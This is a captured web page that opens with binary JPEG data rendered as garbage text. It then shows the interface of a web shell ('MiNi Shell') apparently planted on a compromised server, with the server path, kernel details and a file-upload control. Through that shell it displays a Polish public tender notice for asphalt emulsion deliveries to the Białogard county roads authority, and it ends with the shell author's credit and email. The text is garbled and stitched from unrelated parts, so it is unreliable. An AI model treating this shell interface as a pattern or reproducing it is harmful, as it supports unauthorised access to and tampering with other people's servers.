JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250131/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250131/0008141001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa kationowej emulsji asfaltowej do wykonywania remontów cząstkowych dróg powiatowych Powiatu Białogardzkiego wraz z transportem Wykonawcy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Białogardzki - Zarząd Dróg Powiatowych w Białogardzie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Białogardzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330960380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szosa Połczyńska 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białogard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp.powiat-bialogard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.powiat-bialogard.pl/bip</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa kationowej emulsji asfaltowej do wykonywania remontów cząstkowych dróg powiatowych Powiatu Białogardzkiego wraz z transportem Wykonawcy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4bd34561-89b9-45e3-a67f-1aea9b3cd37b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00081410</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00013916/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa kationowej emulsji asfaltowej dla Zarządu Dróg Powiatowych w Białogardzie wraz z transportem wykonawcy.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4bd34561-89b9-45e3-a67f-1aea9b3cd37b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia środkiem do komunikacji elektronicznej jest Platforma e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi <br/>posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na <br/>temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa <br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej hƩps://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta <br/>na Platformie e-Zamówienia ani logowania. <br/>7. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią <br/>elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z <br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla <br/>dokumentów elektronicznych. <br/>8. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w <br/>sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w <br/>formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram <br/>Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. <br/>W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały <br/>bezpośredniego zastosowania. <br/>9. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa <br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu <br/>sporządza się w postaci elektronicznej: <br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie <br/>Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków <br/>komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do <br/>komunikacji”). <br/>10. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, <br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 <br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) wykonawca, w celu <br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, <br/>wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę <br/>przedsiębiorstwa”. <br/>11. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w <br/>postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji <br/>dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy <br/>do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i <br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do <br/>przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów <br/>w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z <br/>wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu <br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu <br/>i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane <br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym <br/>podpisem (typ wewnętrzny). <br/>12. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga <br/>posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e Zamówienia. Pozostała treść w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego<br/>rozporządzenia o ochronie danych), (Dz. Urz. z 04.05.2016 r. UE L119, s. 1 do 88), dalej RODO, informuję,<br/>że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Białogardzie, 78-200<br/>Białogard, ul. Szosa Połczyńska 57, e-mail: sekretriat@zdp.powiat-bialogard.pl, tel. +48 94 312 40 07,<br/>w imieniu której działa Dyrektor ZDP, zwany dalej „ADMINISTRATOR”;<br/>2. Dane kontaktowe do inspektora ochrony danych: Dariusz Florek, Zarząd Dróg Powiatowych w<br/>Białogardzie, 78-200 Białogard, ul. Szosa Połczyńska 57, e-mail: iod@ordonotitia.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu:<br/>a) związanym z potrzebą przeprowadzenia postępowania o udzielenie zamówienia publicznego<br/>„Dostawa kationowej emulsji asfaltowej do wykonywania remontów cząstkowych dróg<br/>powiatowych Powiatu Białogardzkiego wraz z transportem Wykonawcy” prowadzonym<br/>w trybie podstawowym oraz realizacją i wypełnianiem obowiązku prawnego ciążącego na<br/>ADMINISTRATORZE na podstawie art. 6 ust. 1 lit. c) RODO, tj. obsługi przez ADMINISTRATORA<br/>kontrahentów i współpracowników na podstawie przepisów ustawy z dnia 11 września 2019<br/>roku Prawo zamówień publicznych;<br/>b) realizacji i wykonywania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia<br/>działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy, w celu<br/>przeprowadzenia postępowania w ramach procedury zamówień publicznych przez<br/>ADMINISTRATORA, na podstawie art. 6 ust. 1 lit b) RODO, a także obsługi przez<br/>ADMINISTRATORA kontrahentów i współpracowników w zakresie wypełniania obowiązku<br/>wynikającego z umów zawartych na podstawie przepisów ustawy z dnia 11 września 2019 roku<br/>Prawo zamówień publicznych;<br/>c) niezbędnym dla ustalenia, dochodzenia lub obrony roszczeń wynikających ze zobowiązań, na<br/>podstawie art. 9 ust. 2 lit. f) RODO, np. roszczeń finansowych względem kontrahentów –<br/>wykonawców, biorących udział w postępowaniu organizowanym przez ADMINISTRATORA,<br/>wynikających z naliczonych opłat i kar lub kontraktowych, w celu rozliczeń zawartych umów z<br/>kontrahentami ADMINISTRATORA;<br/>4. odbiorcą Pani/Pana danych osobowych będą:<br/>a. osoby lub organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub<br/>działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z<br/>przepisów powszechnie obowiązującego prawa, w szczególności którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11<br/>września 2019 roku Prawo zamówień publicznych;<br/>b. dane mogą być także przekazywane innym podmiotom, zapewniającym obsługę<br/>administracyjną, techniczną i informatyczną ADMINISTRATORA, a w szczególności podmiotom<br/>administrującym systemami informatycznymi, serwisujących sprzęt informatyczny,<br/>zapewniającym transport dokumentów i nośników elektronicznych, zapewniającym niszczenie<br/>dokumentów i nośników elektronicznych oraz podmiotom zapewniającym obsługę prawną.<br/>Przekazywanie danych realizowane będzie na podstawie zawartych umów, w tym powierzenia<br/>przetwarzania danych, a podmioty przetwarzające mogą je przetwarzać jedynie na polecenie<br/>ADMINISTRATORA, co należy rozumieć w ten sposób, że nie są uprawnione do przetwarzania<br/>tych danych we własnych celach.<br/>5. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej. Pozostała treść w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DzT.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 165500,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 133000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Dostawa kationowej emulsji asfaltowej do wykonywania <br/>remontów cząstkowych dróg powiatowych Powiatu Białogardzkiego wraz z transportem <br/>Wykonawcy” <br/>2. Sukcesywna dostawa kationowej emulsji asfaltowej do wykonywania remontów cząstkowych wraz <br/>z transportem Wykonawcy. <br/>3. Maksymalna ilość przedmiotu zamówienia w okresie obowiązywania umowy wyniesie do 70 Mg<br/>4. Dostarczana emulsja musi spełniać następujące wymagania jakościowe. <br/>5. Emulsja dostarczana będzie każdorazowo na zamówienie Zamawiającego w ilościach od 2,5 Mg do <br/>5 Mg składane telefonicznie lub e-mailem do siedziby zamawiającego, dostarczane transportem <br/>Wykonawcy. <br/>6. Dostawy będą realizowane w terminie nie dłuższym niż 5 dni roboczych od dnia złożenia <br/>zamówienia przez Zamawiającego w godz. od 7.00 do 14.00. <br/>Cały opis przedmiotu zamówienia w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44113700-2 - Materiały do naprawiania nawierzchni drogowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44113600-1 - Bitum i asfalt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy może nastąpić w razie zaistnienia okoliczności: <br/>1) zmiany obowiązkowej stawki podatku od towarów i usług, na pisemny wniosek <br/>Wykonawcy bądź Zamawiającego; <br/>2) zmiany numeru rachunku bankowego Wykonawcy, danych adresowych. <br/>3) wprowadzenia niezbędnych zmian technicznych, technologicznych, organizacyjnych w <br/>zakresie sposobu spełnienia świadczenia lub innych zmian, które warunkują <br/>prawidłowe wykonanie przedmiotu umowy; <br/>4) wystąpienie siły wyższej, to znaczy niezależnego od stron losowego zdarzenia <br/>zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i <br/>któremu nie można było zapobiec mimo dochowania należytej staranności. Siła wyższa <br/>oznacza w niniejszej Umowie takie działania jak: wojna, atak terrorystyczny, stan klęski <br/>żywiołowej, zamieszki, strajki, pożar, trzęsienie ziemi, pioruny, powodzie, wybuchy i <br/>tym 4 podobne zdarzenia, na które strony nie mają wpływu, lecz które utrudniają lub <br/>uniemożliwiają całkowicie lub częściowo realizację zadania, zmieniają w sposób istotny <br/>warunki jego realizacji, i których nie da się uniknąć, nawet przy zastosowaniu <br/>maksymalnej staranności. <br/>2. Dopuszcza się dokonywanie innych zmian w zawartej Umowie w przypadku, gdy ich <br/>konieczność wynika ze zmiany powszechnie obowiązujących przepisów prawa, <br/>prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów – <br/>w takim zakresie, w jakim będzie to niezbędne w celu dostosowania Umowy do <br/>zaistniałego stanu prawnego lub faktycznego. <br/>3. Wystąpienie jednej z powyższych okoliczności mogących skutkować zmianą umowy wymaga <br/>pisemnego, uzasadnionego wniosku Wykonawcy. <br/>4. Wszelkie zmiany w niniejszej umowie wymagają formy pisemnej w postaci aneksu zatwierdzonego <br/>przez obie strony, pod rygorem nieważności. <br/>5. Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących <br/>następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania <br/>aneksu <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com